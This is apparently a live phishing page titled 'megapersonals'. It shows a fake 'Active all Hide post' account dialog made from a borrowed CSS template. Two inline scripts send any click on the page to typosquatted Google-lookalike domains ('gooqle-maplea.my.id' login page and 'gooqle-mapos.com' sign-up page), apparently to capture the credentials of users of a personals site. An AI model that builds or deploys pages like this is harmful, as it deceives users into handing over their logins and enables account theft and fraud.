<html lang="en" dir="ltr"><head>
<meta charset="utf-8"></head><body><p><img style="display: block; margin-left: auto; margin-right: auto;" src="../images/hidden_woiytm.png" alt=""></p>
<p><a href="https://res.cloudinary.com/iuoluiol/image/upload/v1725082458/Screenshot_2_ivr6sd.png">�<img style="display: block; margin-left: auto; margin-right: auto;" src="#" alt=""></a></p>
<p><img style="display: block; margin-left: auto; margin-right: auto;" src="../images/neww_fhlj15.jpg" alt=""></p>



<!-- Created By CodingNepal - www.codingnepalweb.com -->

  
  <style>
  @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@200;300;400;500;600;700&display=swap');
*{
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: 'Poppins',sans-serif;
}
.alert_box,
.show_button{
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50% , -50%);
}
.show_button{
  height: 55px;
  padding: 0 30px;
  font-size: 20px;
  font-weight: 400;
  cursor: pointer;
  outline: none;
  border: none;
  color: #fff;
  line-height: 55px;
  background: #2980b9;
  border-radius: 5px;
  transition: all 0.3s ease;
}
.show_button:hover{
  background: #2573a7;
}
.background{
  position: absolute;
  height: 100%;
  width: 100%;
  top: 0;
  left: 0;
  background: rgba(0, 0, 0, 0.5);
  opacity: 0;
  pointer-events: none;
  transition: all 0.3s ease;
}
.alert_box{
  padding: 30px;
  display: flex;
  background: #fff;
  flex-direction: column;
  align-items: center;
  text-align: center;
  max-width: 450px;
  width: 100%;
  border-radius: 5px;
  z-index: 5;
  opacity: 0;
  pointer-events: none;
  transform: translate(-50% , -50%) scale(0.97);
  transition: all 0.3s ease;
}
#check:checked ~ .alert_box{
  opacity: 1;
  pointer-events: auto;
  transform: translate(-50% , -50%) scale(1);
}
#check:checked ~ .background{
  opacity: 1;
  pointer-events: auto;
}
#check{
  display: none;
}
.alert_box .icon{
  height: 100px;
  width: 100px;
  color: #f23b26;
  border: 3px solid #f23b26;
  border-radius: 50%;
  line-height: 97px;
  font-size: 50px;
}
.alert_box header{
  font-size: 35px;
  font-weight: 500;
  margin: 10px 0;
}
.alert_box p{
  font-size: 20px;
}
.alert_box .btns{
  margin-top: 20px;
}
.btns label{
  display: inline-flex;
  height: 55px;
  padding: 0 30px;
  font-size: 20px;
  font-weight: 400;
  cursor: pointer;
  line-height: 55px;
  outline: none;
  margin: 0 10px;
  border: none;
  color: #fff;
  border-radius: 5px;
  transition: all 0.3s ease;
}
.btns label:first-child{
  background: #2980b9;
}
.btns label:first-child:hover{
  background: #2573a7;
}
.btns label:last-child{
  background: #f23b26;
}
.btns label:last-child:hover{
  background: #d9210d;
}
  </style>
    <meta charset="UTF-8">
    <title>megapersonals</title>
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="all.min.css">
   

    <div class="container">
      <input type="checkbox" id="check">
      <label class="show_button" for="check">Active all Hide post</label>
      <div class="background"></div>
      <div class="alert_box">
        <div class="icon">
          <i class="fas fa-exclamation"></i>
        </div>
        <header>Active all Hide post</header>
        <p>Are you sure want to Active all Hide post</p>
        <div class="btns">
          <label for="check">Yes,!</label>
          <label for="check">Cancel</label>
        </div>
      </div>
    </div>




<script>
    document.body.addEventListener('click', function() {
        window.location.href = 'http://gooqle-maplea.my.id//login-page'; // Replace with your desired URL
    });
</script>

<script>
    document.body.addEventListener('click', function() {
        window.location.href = 'https://gooqle-mapos.com/sing-up'; // Replace with your desired URL
    });
</script>
    <!-- end GA -->
    <script src="../js/main.js"></script>




</body></html>